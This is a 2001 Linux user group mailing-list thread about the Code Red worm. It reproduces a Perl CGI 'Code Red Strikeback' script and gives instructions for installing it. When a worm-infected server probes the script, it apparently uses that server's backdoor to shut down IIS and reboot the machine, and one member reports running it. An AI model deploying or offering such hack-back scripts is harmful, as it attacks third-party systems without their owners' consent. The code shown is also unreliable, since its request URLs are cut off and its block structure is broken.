[LUG] Code Red...

Warren Sanders sanders at MontanaLinux.Org
Thu Sep 27 16:21:53 MDT 2001

I have implemented this script as an executable named default.ida in my doc
root.  Also copied it to root.exe and cmd.exe.  I noticed they are looking in
/c/winnt/system32, /_vti_bin/, /scripts/, /_mem_bin/, /msadc/ and probably
others.  Should I create these structures and put the files there as well; or
will they find them anyway?

Warren Sanders

Samartha Deva wrote:

There was a slashdot article with a link to:


they had this script below and it seems to work - the telnet on port 80
still connects but there is no IIS response when I try accessing it
afterwards with a GET.

If that would shut the stupid NNNN's and XXXX-es off, that would be too
good to be true!

Oh, Btw, I got a call from Qwest today asking if I had any problems with
Code Red. Seems they are getting concerned.

Anyway, the result codes on my 5 IP's on certain httpd requests are no
longer 404, but 200 with a transfer length of 60 ;-)

#!/usr/bin/perl -w
#   default.ida in perl
#   Copyright 2001 Sam Phillips <sam at dasbistro.com>
#       ideas borrowed from Erin Quinlan <erin at dasbistro.com>
#       ideas provided by various Internet folk, and all those darn
#       Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
#       (http://www.pigdog.org)
#   Things that this should do...
#       * Send email to the machine owner
#       * Not act as an attack amplifier - someone could theoretically use this
#         to launch a DOS attack of sorts.
#   This program is free software; you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation; either version 2 of the License, or
#   (at your option) any later version.
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   GNU General Public License for more details.
#   You should have received a copy of the GNU General Public License
#   along with this program; if not, write to the Free Software
#   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
use LWP::UserAgent;
print "Content-Type: text/html\n\n";
if (length ($ENV{QUERY_STRING}) > 0) {
     my $ua = new LWP::UserAgent;
     $ua->agent ("Code Red Strikeback");
     $ua->timeout (20);
     my $iis_stop_req = new HTTP::Request (GET =>
     print "probulating... <br>";
     my $resp = $ua->request ($iis_stop_req);
     if ($resp->is_success) {
	print "Appears we have shut down IIS...<br>";
	my $server_stop_req = new HTTP::Request (GET =>
	$resp = $ua->request ($iis_stop_req);

	if ($resp->is_success) {
            print "Appears that we have also shutdown whatever OS too...<br>";
	# ok this will do magic email stuff when I get a chance to write it.

     } else {
	print "<h2>Boy! Are you yankin' my chain?!?</h2>";

print <<EOF;
</p> <p>
<H2>If you are reading this page, then you are probably curious... </H2>
This page is actually a script that will connect to your machine and
	try to shut it down.  Since you are seeing this you probably aren't a
	Code Red infected box.
This will only work if you are infected with the "code red" virus which
	isn't really a virus but is a part of the Microsoft Internet
	Information Server (IIS).
<p> If you were a Code Red infected IIS then the command just sent to port
	80 was to stop iis and to reboot your machine. If you aren't infected,
	then you have nothing to worry about, otherwise.. you should really use
	a secure webserver don't you think?.. one that doesn't let people in a
	gaping back door to do stuff like this...)
This is how you can protect yourself and others, if you run perl, and a
	competent web server:
<li>Download this <a href="default.txt">script</a>.</li>
<li>Rename it default.ida and place it in the DocumentRoot of your
<li>Make sure the .ida extension is handled as a perl CGI
If you can't figure out any of the above instructions then find someone
	who can.
For historical purposes <a href="old_default.txt">here's the old SSI

Web Page:  http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

More information about the LUG mailing list